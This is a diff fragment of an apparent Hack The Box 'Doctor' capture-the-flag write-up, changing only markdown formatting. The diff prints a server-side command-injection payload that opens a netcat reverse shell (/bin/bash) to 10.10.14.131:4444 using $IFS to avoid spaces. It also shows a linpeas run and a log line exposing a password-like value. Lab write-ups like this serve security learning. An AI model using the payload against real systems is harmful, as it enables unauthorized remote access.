Doctor

 return render_template_string(tpl)

-Also, shell injection works without the archive page: <img src=http://10.10.14.131/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.131'$IFS'4444')/>.
+Also, shell injection works without the archive page: `<img src=http://10.10.14.131/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.131'$IFS'4444')/>`.

-11. Linpeas (./linpeas.sh -a 2>&1 | tee linpeas_report.txt) finds backup file /var/log/apache2/backup with has this line in it: /var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password".
-You can open linpeas_report_web.txt with less -R linpeas_report_web.txt
+11. Linpeas (`./linpeas.sh -a 2>&1 | tee linpeas_report.txt`) finds backup file `/var/log/apache2/backup` with has this line in it: `/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"`.
+You can open [linpeas\_report\_web.txt](https://github.com/HHousen/hack-the-box/blob/master/Machines/Doctor/linpeas_report_web.txt) with `less -R linpeas_report_web.txt`

 12. Linpeas users: